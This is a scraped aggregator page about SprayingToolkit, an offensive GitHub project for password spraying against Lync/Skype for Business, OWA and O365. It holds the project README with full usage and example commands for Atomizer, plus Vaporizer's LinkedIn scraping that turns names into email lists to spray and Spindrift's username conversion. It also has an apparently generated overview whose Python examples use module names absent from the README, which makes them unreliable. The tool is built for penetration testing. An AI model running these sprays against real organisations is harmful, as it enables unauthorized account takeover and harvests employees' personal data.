Convert Figma logo to code with AI

byt3bl33d3r logoSprayingToolkit

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient

1,443
266
1,443
22
View on GitHub

Top Related Projects

dafthack's avatar

MailSniper

2,899

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.

Quick Overview

SprayingToolkit is a collection of tools designed for password spraying attacks against various services and protocols. It includes modules for attacking Active Directory, Office 365, OWA, and other common enterprise services. The toolkit aims to simplify and automate the process of conducting password spraying attacks for penetration testers and security researchers.

Pros

  • Comprehensive coverage of multiple services and protocols
  • Modular design allows for easy expansion and customization
  • Includes features for handling rate limiting and account lockouts
  • Supports various authentication methods and input formats

Cons

  • Potential for misuse in unauthorized testing or malicious activities
  • Requires careful configuration to avoid account lockouts or detection
  • May not always be up-to-date with the latest service changes or security measures
  • Limited documentation for some advanced features

Code Examples

# Example 1: Basic usage of the AD sprayer module
from core.utils import parse_credentials
from modules.sprayers.ad_sprayer import ADSprayer

creds = parse_credentials('users.txt', 'passwords.txt')
sprayer = ADSprayer('domain.com', creds)
sprayer.spray()

# Example 2: Using the Office 365 sprayer with custom settings
from modules.sprayers.o365_sprayer import O365Sprayer

sprayer = O365Sprayer('company.onmicrosoft.com', creds)
sprayer.set_delay(5)  # Set delay between attempts
sprayer.set_jitter(2)  # Add random jitter to delay
sprayer.spray()

# Example 3: Handling results and generating reports
from core.results import SprayingResults

results = sprayer.get_results()
report = SprayingResults(results)
report.generate_csv('spray_results.csv')
report.generate_html('spray_results.html')

Getting Started

  1. Clone the repository:

    git clone https://github.com/byt3bl33d3r/SprayingToolkit.git

  2. Install dependencies:

    cd SprayingToolkit
pip install -r requirements.txt

  3. Create input files (users.txt and passwords.txt)

  4. Run a basic spray attack:

    from core.utils import parse_credentials
from modules.sprayers.ad_sprayer import ADSprayer

creds = parse_credentials('users.txt', 'passwords.txt')
sprayer = ADSprayer('domain.com', creds)
sprayer.spray()

Note: Always ensure you have proper authorization before using this toolkit against any systems or networks.

Competitor Comparisons

dafthack logo

MailSniper

2,899

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.

Pros of MailSniper

  • Focused specifically on email-related attacks and reconnaissance
  • Includes features for searching mailboxes and downloading attachments
  • Supports multiple Exchange protocols (EWS, OWA, EAS)

Cons of MailSniper

  • Limited to Microsoft Exchange environments
  • Less actively maintained (last update over 2 years ago)
  • Narrower scope compared to SprayingToolkit's broader password spraying capabilities

Code Comparison

MailSniper:

function Invoke-PasswordSprayOWA {
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, Mandatory = $false)]
        [string]
        $ExchangeVersion = "Exchange2013",
        [Parameter(Position = 1, Mandatory = $true)]
        [string]
        $Uri
    )
    # ... (additional code)
}

SprayingToolkit:

def parse_module_options():
    parser = argparse.ArgumentParser(add_help=False, description="Password spraying tool for Lync/S4B")
    parser.add_argument("-H", "--host", type=str, help="Target IP address or Hostname")
    parser.add_argument("-U", "--userfile", type=str, help="File containing usernames")
    parser.add_argument("-P", "--password", type=str, help="Password to spray")
    # ... (additional code)

The code snippets show that MailSniper is written in PowerShell and focuses on Exchange-specific functions, while SprayingToolkit is written in Python and offers a more general-purpose password spraying approach.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Deprecation Notice

This project is no longer maintained. The following alternative projects are better and actively maintained:

SprayingToolkit

SprayingToolkit

Description

A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

Sponsors

Official Discord Channel

Come hang out on Discord!

Porchetta Industries

Installation

Install the pre-requisites with pip3 as follows:

sudo -H pip3 install -r requirements.txt

Or use a Python virtual environment if you don't want to install the packages globally.

Tool Overview

Atomizer

A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7

Usage

Usage:
    atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    -p, --targetPort PORT    target port of the IMAP server (IMAP only) [default: 993]
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)

Examples

./atomizer.py owa contoso.com 'Fall2018' emails.txt

./atomizer.py lync contoso.com 'Fall2018' emails.txt

./atomizer lync contoso.com --csvfile accounts.csv

./atomizer lync contoso.com --user-as-pass usernames.txt

./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon

./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>

Vaporizer

A port of @OrOneEqualsOne's GatherContacts Burp extension to mitmproxy with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.

(Built on top of Atomizer)

Examples

mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

By default email_format is set to {first}.{last} pattern and is not a required argument.

The domain parameter is the domain to use for generating emails from names, the target parameter is the domain or url to password spray

Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the /in):

site:linkedin.com/in "Target Company Name"

Emails will be dumped to emails.txt in the specified format, and passed to Atomizer for spraying.

Aerosol

Scrapes all text from the target website and sends it to AWS Comprehend for analysis to generate custom wordlists for password spraying.

Still a work in progress

Usage

mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Converts names to active directory usernames (e.g Alice Eve => CONTOSO\aeve)

Usage

Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]

Examples

Reads names from STDIN, --domain is used to specify the domain manually:

cat names.txt | ./spindrift.py --domain CONTOSO

Reads names from names.txt, --target dynamically grabs the internal domain name from OWA (you can give it a domain or url)

./spindrift.py names.txt --target contoso.com